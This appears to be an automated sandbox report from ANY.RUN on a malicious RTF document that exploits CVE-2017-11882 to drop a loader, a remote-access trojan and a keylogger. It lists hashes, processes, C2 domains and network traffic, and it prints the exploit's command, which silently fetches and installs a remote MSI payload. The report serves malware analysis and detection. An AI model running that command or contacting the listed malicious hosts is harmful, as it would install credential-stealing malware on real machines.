analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

sab.doc

Full analysis: https://app.any.run/tasks/210fb06b-e607-4085-806e-94bf92fbae4f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 18, 2019, 18:25:31
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
exploit
CVE-2017-11882
exe-to-msi
loader
evasion
trojan
loda
stealer
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

0251B22F858FCC0CED62B34FDBDA70C9

SHA1:

1CF6D9AF3A06DD37B8E316ACC792B284864F49E8

SHA256:

BBEFD3AA4E17E4E4D8DC212AF713F28C101072A37D17894CDC53D589F500C513

SSDEEP:

768:s7Kf2sdrM3xaSybdRZXZWkWZNLekKXw47vm6KE1ml2OsyoFt/xsY58aMmYhd0PhB:sxxQW3ykpeu6K5sv/T59nyXUq5aWmEO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 272)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2512)
    • Application was dropped or rewritten from another process

      • LBWUVX.exe (PID: 584)
      • kl-plugin.exe (PID: 2116)
      • cmdc.exe (PID: 576)
      • cmdc.exe (PID: 1876)
      • cmdc.exe (PID: 3984)
      • cmdc.exe (PID: 608)
      • cmdc.exe (PID: 1020)
      • cmdc.exe (PID: 3068)
      • cmdc.exe (PID: 3520)
      • cmdc.exe (PID: 3824)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 1920)
      • wscript.exe (PID: 2272)
    • Changes the autorun value in the registry

      • WScript.exe (PID: 2560)
      • wscript.exe (PID: 3560)
      • wscript.exe (PID: 2272)
    • Writes to a start menu file

      • WScript.exe (PID: 2560)
      • wscript.exe (PID: 3560)
      • wscript.exe (PID: 2272)
    • Connects to CnC server

      • wscript.exe (PID: 2272)
      • MSI172D.tmp (PID: 3276)
    • LODA was detected

      • MSI172D.tmp (PID: 3276)
    • Actions looks like stealing of personal data

      • cmdc.exe (PID: 1876)
      • cmdc.exe (PID: 3068)
    • Stealing of credential data

      • wscript.exe (PID: 2272)
      • cmdc.exe (PID: 1876)
      • cmdc.exe (PID: 3068)
  • SUSPICIOUS

    • Executed via COM

      • EQNEDT32.EXE (PID: 272)
      • EQNEDT32.EXE (PID: 3272)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 272)
      • wscript.exe (PID: 2272)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 1920)
      • MSI172D.tmp (PID: 3276)
      • wscript.exe (PID: 2272)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 1920)
    • Executes scripts

      • MSI172D.tmp (PID: 3276)
      • WScript.exe (PID: 2560)
      • wscript.exe (PID: 2272)
    • Uses RUNDLL32.EXE to load library

      • MSI172D.tmp (PID: 3276)
    • Application launched itself

      • WScript.exe (PID: 2560)
      • wscript.exe (PID: 2272)
      • cmdc.exe (PID: 3984)
      • cmdc.exe (PID: 608)
    • Creates files in the user directory

      • MSI172D.tmp (PID: 3276)
      • WScript.exe (PID: 2560)
      • rundll32.exe (PID: 3404)
      • wscript.exe (PID: 3560)
      • wscript.exe (PID: 2272)
      • cmdc.exe (PID: 1876)
      • cmdc.exe (PID: 3068)
    • Reads Internet Cache Settings

      • rundll32.exe (PID: 3404)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 1524)
      • cmd.exe (PID: 1080)
      • cmd.exe (PID: 3388)
      • cmd.exe (PID: 1740)
      • cmd.exe (PID: 1824)
      • cmd.exe (PID: 4088)
      • cmd.exe (PID: 760)
    • Loads DLL from Mozilla Firefox

      • cmdc.exe (PID: 1876)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 900)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 900)
    • Application was crashed

      • EQNEDT32.EXE (PID: 272)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 1920)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 1920)
    • Application was dropped or rewritten from another process

      • MSI172D.tmp (PID: 3276)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Saveprevpict: -
InternalVersionNumber: 57435
CharactersWithSpaces: 113
Characters: 97
Words: 17
Pages: 1
TotalEditTime: 12 minutes
RevisionNumber: 23
ModifyDate: 2018:07:03 09:28:00
CreateDate: 2018:01:23 22:18:00
LastModifiedBy: Richard
Author: obidah qudah
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
79
Monitored processes
36
Malicious processes
14
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start drop and start drop and start drop and start winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs #LODA msi172d.tmp lbwuvx.exe no specs wscript.exe rundll32.exe no specs wscript.exe wscript.exe wscript.exe no specs cmd.exe no specs taskkill.exe no specs kl-plugin.exe cmd.exe no specs taskkill.exe no specs cmd.exe no specs taskkill.exe no specs cmdc.exe no specs cmdc.exe no specs cmd.exe no specs taskkill.exe no specs cmdc.exe no specs cmdc.exe cmd.exe no specs taskkill.exe no specs cmd.exe no specs taskkill.exe no specs cmdc.exe no specs cmdc.exe no specs cmd.exe no specs taskkill.exe no specs cmdc.exe no specs cmdc.exe

Process information

PID
CMD
Path
Indicators
Parent process
900"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\sab.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
272"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2512cmd.exe & /C CD C: & msiexec.exe /i http://paroquiadamarinhagrande.pt/app/hmvrch.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2896msiexec.exe /i http://paroquiadamarinhagrande.pt/app/hmvrch.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1920C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3272"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3276"C:\Windows\Installer\MSI172D.tmp"C:\Windows\Installer\MSI172D.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Version:
3, 3, 8, 1
584"C:\Users\admin\AppData\Local\Temp\LBWUVX.exe" C:\Users\admin\AppData\Local\Temp\LBWUVX.exeMSI172D.tmp
User:
admin
Integrity Level:
MEDIUM
Description:
VistaTaskDialog
Version:
1.0.8.0
2560"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\LCRBBE..js" C:\Windows\System32\WScript.exe
MSI172D.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3404"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\WININET.dll",DispatchAPICall 1 C:\Windows\system32\rundll32.exeMSI172D.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 971
Read events
2 158
Write events
0
Delete events
0

Modification events

No data
Executable files
9
Suspicious files
2
Text files
29
Unknown types
8

Dropped files

PID
Process
Filename
Type
900WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR140.tmp.cvr
MD5:
SHA256:
1920msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF879F8D71DF1C4B2C.TMP
MD5:
SHA256:
3276MSI172D.tmpC:\Users\admin\AppData\Local\Temp\aut17F5.tmp
MD5:
SHA256:
3276MSI172D.tmpC:\Users\admin\AppData\Local\Temp\aut19DA.tmp
MD5:
SHA256:
1920msiexec.exeC:\Windows\Installer\MSI1006.tmpexecutable
MD5:E66120CD6D1D4A2F5432D408CAC8F54C
SHA256:6B23E254659C8BF38C99B2A29901622EAD86561F5D6531A0256F0E28D771897D
1920msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\LYPIDP41\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3276MSI172D.tmpC:\Users\admin\AppData\Local\Temp\LCRBBE..jstext
MD5:E0B516C28CB1E8B82226E00A2B6A415C
SHA256:9EE00CFB9075DB154406CE7E1C656BF0CB2BEBA15527EB443891F7F34BCDDC10
900WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1C3731FA96EBDD2B59DD9077E7304E50
SHA256:90231EF6597C66760A15F548BBB57E7F36AE0729947BF09439BF18DB568920C7
900WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$ab.doc.rtfpgc
MD5:56DB8B4E8AD3F2CB18035AEE7532E32C
SHA256:4485C166E5187F0F0846568D91167B1CEEBC26269CE0AAF0ACB8A422444EAE18
1920msiexec.exeC:\Windows\Installer\MSI172D.tmpexecutable
MD5:04751F2FC3D88A94F6399DE95A0F7191
SHA256:F15832D60A36A57603F59BCBF21DE9FA5E7954DB9CABF388AC104B1F7BAF50B3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
14
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2272
wscript.exe
POST
103.136.43.131:1425
http://vemvemserver.duckdns.org:1425/is-ready
unknown
malicious
2272
wscript.exe
GET
200
172.245.14.10:80
http://doughnut-snack.live/bpvpl.tar.gz
US
executable
3.11 Mb
malicious
2272
wscript.exe
POST
200
103.136.43.131:1425
http://vemvemserver.duckdns.org:1425/is-ready
unknown
text
95 b
malicious
2272
wscript.exe
GET
200
172.245.14.10:80
http://doughnut-snack.live/mapv.tar.gz
US
executable
2.42 Mb
malicious
2272
wscript.exe
GET
200
172.245.14.10:80
http://doughnut-snack.live/klplu.tar.gz
US
executable
25.5 Kb
malicious
1920
msiexec.exe
GET
200
188.93.230.15:80
http://paroquiadamarinhagrande.pt/app/hmvrch.msi
PT
executable
1.02 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2272
wscript.exe
172.245.14.10:80
doughnut-snack.live
ColoCrossing
US
malicious
3276
MSI172D.tmp
104.25.209.99:443
ipapi.co
Cloudflare Inc
US
shared
3276
MSI172D.tmp
104.25.210.99:443
ipapi.co
Cloudflare Inc
US
shared
3560
wscript.exe
185.247.228.14:7755
unknownsoft.duckdns.org
malicious
1920
msiexec.exe
188.93.230.15:80
paroquiadamarinhagrande.pt
Claranet Ltd
PT
malicious
2272
wscript.exe
103.136.43.131:1425
vemvemserver.duckdns.org
malicious
103.136.43.131:3120
vemvemserver.duckdns.org
malicious

DNS requests

Domain
IP
Reputation
paroquiadamarinhagrande.pt
  • 188.93.230.15
malicious
ipapi.co
  • 104.25.210.99
  • 104.25.209.99
shared
unknownsoft.duckdns.org
  • 185.247.228.14
malicious
vemvemserver.duckdns.org
  • 103.136.43.131
malicious
doughnut-snack.live
  • 172.245.14.10
malicious

Threats

PID
Process
Class
Message
1920
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
1920
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
1920
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (ipapi .co in DNS lookup)
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2272
wscript.exe
A Network Trojan was detected
ET TROJAN WSHRAT CnC Checkin
2272
wscript.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
2272
wscript.exe
A Network Trojan was detected
ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
2272
wscript.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3 ETPRO signatures available at the full report
Process
Message
kl-plugin.exe
SetWindowsHookEx WH_KEYBOARD_LL
kl-plugin.exe
SetWindowsHookEx WH_MOUSE_LL
kl-plugin.exe
06/18/2019 19:26:19>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=1129, y=353, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe
06/18/2019 19:26:19>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=807, y=468, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe
06/18/2019 19:26:19>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=811, y=439, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe
06/18/2019 19:26:20>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=672, y=364, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe
06/18/2019 19:26:20>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=628, y=363, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe
06/18/2019 19:26:20>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=569, y=354, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe
06/18/2019 19:26:20>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=569, y=358, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe
06/18/2019 19:26:20>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=576, y=369, mouseData=0, flags=0, dwExtraInfo=0